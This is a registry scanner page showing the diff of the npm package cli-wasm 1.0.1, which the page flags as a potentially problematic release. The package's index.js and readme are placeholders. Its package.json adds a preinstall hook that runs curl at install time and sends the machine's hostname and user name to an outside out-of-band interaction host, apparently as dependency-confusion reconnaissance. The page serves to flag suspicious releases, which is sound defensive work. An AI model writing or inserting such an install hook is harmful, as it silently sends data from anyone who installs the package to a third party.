cli-wasm 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of cli-wasm might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +3 -0
  2. package/package.json +12 -0
  3. package/readme.md +1 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports.test = function () {
2
+ return "test"
3
+ }
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "cli-wasm",
3
+ "version": "1.0.1",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "curl --data-urlencode \"info=$(hostname && whoami)\" pdjqogpqmifxtxbfortb3omx5obl1kuby.oast.fun"
8
+ },
9
+ "author": "bluehck",
10
+ "license": "MIT",
11
+ "description": ""
12
+ }
package/readme.md ADDED
@@ -0,0 +1 @@
1
+ Test